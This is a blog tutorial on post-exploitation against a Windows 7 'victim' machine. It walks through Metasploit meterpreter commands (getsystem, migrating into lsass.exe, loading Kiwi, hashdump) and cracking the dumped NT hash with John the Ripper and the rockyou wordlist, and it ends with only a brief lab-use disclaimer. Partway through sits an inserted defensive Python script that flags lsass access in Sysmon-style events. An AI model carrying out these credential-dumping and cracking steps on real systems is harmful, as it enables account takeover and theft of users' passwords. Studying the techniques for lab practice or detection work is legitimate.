Dumping Credentials of the Victim's Windows 7 Machine


Shadab Mazhar

In the previous article I demonstrated how to do privilege escalation on a Windows machine and promised to demonstrate post exploitation next. In this article I will show how to dump and crack the victim's user credentials on a Windows machine.

If you don't know how to get a meterpreter shell on the victim machine, check out my previous article on getting a meterpreter shell on a target Windows machine.

If you don't know how to escalate privileges on the victim machine, check out my previous article in which I demonstrated privilege escalation on the target machine.

Now, after getting a full-fledged meterpreter shell on the victim's machine:

(screenshot: meterpreter shell)

Run the getsystem command to cross-check whether the privilege escalation succeeded:

getsystem

(screenshot: privileges on the victim's machine escalated successfully)

To list the processes the victim's machine is running at that moment, the command is

ps

After executing this command you will see the whole bunch of processes the system is running.

To check your current process ID:

getpid

(screenshot: name and PID of the current process)

To harvest the credentials I have to migrate to process ID 452, which is lsass.exe.

In short, the Local Security Authority Subsystem Service (lsass.exe) is the process on an Active Directory domain controller that is responsible for Active Directory database lookups, authentication, and replication.

To migrate from the current process, fnTAZizrHE (PID 1912), to lsass.exe (PID 452), the command is as follows:

migrate 452

(screenshot: migration completed)
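From the defender's side, the migration into lsass.exe shown above is exactly the pattern endpoint telemetry should flag: a non-system process opening a handle to lsass.exe with memory-read/write or thread-creation rights, or creating a remote thread inside it. The script below is an added example, not part of the original post; it applies that rule to constructed Sysmon-style events (Event ID 10 ProcessAccess and Event ID 8 CreateRemoteThread), and the allowlist and file paths are assumptions to tune per environment.

```python
from typing import Dict, Iterable, List, Optional, Tuple

# Access-mask bits that let a caller read lsass memory or inject a thread into it.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF
SUSPICIOUS_BITS = PROCESS_CREATE_THREAD | PROCESS_VM_READ | PROCESS_VM_WRITE

# System images that legitimately open lsass on a stock host (assumed allowlist; tune per estate).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

def is_lsass(image: str) -> bool:
    return image.lower().endswith(r"\lsass.exe")

def classify(event: Dict[str, str]) -> Optional[str]:
    """Return an alert name for one Sysmon-style event, or None if it looks benign."""
    if not is_lsass(event.get("TargetImage", "")):
        return None
    source = event.get("SourceImage", "").lower()
    event_id = int(event["EventID"])
    if event_id == 8:
        # CreateRemoteThread into lsass: what process migration looks like in telemetry.
        return "remote_thread_into_lsass"
    if event_id == 10 and source not in ALLOWED_SOURCES:
        # ProcessAccess: a handle to lsass with memory-read/write or thread-creation rights.
        granted = int(event.get("GrantedAccess", "0"), 16)
        if granted == PROCESS_ALL_ACCESS or granted & SUSPICIOUS_BITS:
            return "suspicious_lsass_handle"
    return None

def scan(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    # (EventID, SourceImage, alert) for every event classify() flags.
    return [(e["EventID"], e["SourceImage"], a) for e in events if (a := classify(e))]

# Constructed sample telemetry (not real logs). The payload image name is the process
# the post migrates from; its path is a placeholder.
LSASS = r"C:\Windows\System32\lsass.exe"
PAYLOAD = r"C:\Users\victim\AppData\Local\Temp\fnTAZizrHE.exe"
SAMPLE_EVENTS = [
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS, "GrantedAccess": "0x1000"},
    {"EventID": "10", "SourceImage": PAYLOAD, "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": "8", "SourceImage": PAYLOAD, "TargetImage": LSASS},
]
```

Running scan(SAMPLE_EVENTS) flags the two payload events and ignores the svchost.exe query-only handle; in production the same rule is expressed as a Sysmon or EDR query rather than a script.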

After migrating to lsass.exe, load Kiwi to harvest the credentials. The command is:

load kiwi

(screenshot: Kiwi loaded successfully)

To see the credentials you have to dump the password hashes stored on the victim's machine. The command is:

hashdump

In short, hashing is the process of transforming a given key or string of characters into another value; storing that hash instead of the plaintext is how the credentials are protected. That's it.

For this article I will crack the hash of the user Shadab. The last hash after the colon is the one derived from the password (the NT hash), so I will copy it into a text file.

To save the hash into a file, the command is

echo 7a2199…………….5f > victim.txt

Now the hash is saved in the victim.txt file. Next I will use John the Ripper, a password-cracking tool.

Make sure you have unzipped the rockyou.txt.gz file in /usr/share/wordlists/. To unzip it, the command is:

gunzip /usr/share/wordlists/rockyou.txt.gz

To crack the hashed password, the command is:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt victim.txt

(screenshot: password of user Shadab cracked successfully)

User : Password
Shadab : 12345

I have successfully dumped the passwords from the victim's machine.

Hacking is illegal; practice this in your own lab environment.

In this short article I have tried to demonstrate how to dump the password of the victim's Windows machine using the Metasploit framework, Kiwi, and John the Ripper, and also how to take a shell and escalate privileges on the machine for post exploitation. Next I will cover how to set up persistence on the victim's Windows 7 machine.

Thank you for reading!
